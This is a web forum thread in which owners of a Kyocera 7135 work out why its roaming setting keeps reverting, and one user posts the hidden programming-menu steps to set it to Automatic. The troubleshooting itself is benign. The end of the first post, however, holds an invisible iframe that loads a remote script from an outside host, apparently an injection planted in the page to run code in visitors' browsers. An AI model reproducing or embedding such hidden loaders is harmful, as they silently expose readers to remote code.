+ Reply to Thread
Results 1 to 9 of 9
  1. #1
    Registered User
    Join Date
    01-14-2003
    Posts
    173

    Automatic Roaming - VZW Screwed Up!

    Whenever I set my 7135 to "Automatic" (vs "No Roaming") and power off/on, the phone reverts back to "No Roaming". I just got off the phone with a Kyo rep and he says VZW screwed up the programming and won't tell me how to fix it. He wants me to go into a VZW store.

    The phone works fine in my local area, but I'm in OKC and there are no VZW stores here. Can anyone help? Please???<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

  2. #2
    Registered User
    Join Date
    03-29-2002
    Location
    San Juan, PR
    Posts
    230
    maybe if you press 111111, there is a menu in there somewhere to control this behaviour.

    Jorge

  3. #3
    Registered User
    Join Date
    01-14-2003
    Posts
    173
    Jorge, you're right. I put it into programming mode and found the roaming setting. I changed it and everything's fine. Thanks for your help.

  4. #4
    Registered User
    Join Date
    06-22-2003
    Posts
    10
    "Whenever I set my 7135 to "Automatic" (vs "No Roaming") and power off/on, the phone reverts back to "No Roaming". I just got off the phone with a Kyo rep and he says VZW screwed up the programming and won't tell me how to fix it. He wants me to go into a VZW store."

    "Jorge, you're right. I put it into programming mode and found the roaming setting. I changed it and everything's fine. Thanks for your help."

    I would appreciate you telling me how did you change it. I have the same problem and did the 111111 options but how would I know what configuration/setting to use. Can you be more specific.

    Thanks.

  5. #5
    Registered User
    Join Date
    01-21-2003
    Location
    st louis mo
    Posts
    114

    i got it too

    i have the same issue,can you elaborate on what you did to fix it,if i do not power off the phone or if i remember each time to manually go back and change it will i have any problems when roaming. i noticed when i first went to that screen the setting was marked "standard" when i clicked on it the 2 choices are "automatic" or "{ no roaming" i cant get it to say standard like b4 any ideas?

  6. #6
    Registered User
    Join Date
    01-14-2003
    Posts
    173
    Ok, here's how to do it.

    1. Make sure you are in "phone" mode.
    2. Press "111111" on the keyboard. Notice that you now have more menu choices than before.
    3. Go to "Options", then to "Programming"
    4. Enter the Code requested, normally "000000".
    5. Press the "More" button.
    6. In the upper-right menu, select "System".
    7. Half way down, change the setting for "Preferred Serving System" to "Automatic".
    8. Press "Save & Exit".

  7. #7
    Registered User
    Join Date
    06-22-2003
    Posts
    10
    "i noticed when i first went to that screen the setting was marked "standard" when i clicked on it the 2 choices are "automatic" or "{ no roaming" i cant get it to say standard like b4 any ideas?"

    First of all thank you JeffC it worked, and it is now on automatic.

    I am wondering, the same thing happened to me, although is set to automatic now, does anyone know what the difference between this options are??

  8. #8
    Registered User
    Join Date
    01-21-2003
    Location
    st louis mo
    Posts
    114
    thanx jeff c,it worked with no problem,dont know why this happens or what it would cause to happen but thanx once again to tis board for all the help

  9. #9
    Registered User
    Join Date
    01-14-2003
    Posts
    173
    The difference between Automatic and No Roaming is this (at least on Verizon):

    On No Roaming, your phone will only accept signals when you are within your "home" system. For me, that's basically Central Indiana. If you travel to any other Verizon or "Verizon Extended" area, you won't have a signal.

    With Automatic, your phone will accept non-home systems. It's up to you to know the difference between a flashing "R" (Roaming) and a steady "R". Flashing means you're in the Extended Verizon area and will not incur roaming charges. A steady "R" means that you are outsde the Extended Verizon area and will incur roaming charges.

Posting Permissions

  • You may not post new threads
  • You may not post replies
  • You may not post attachments
  • You may not edit your posts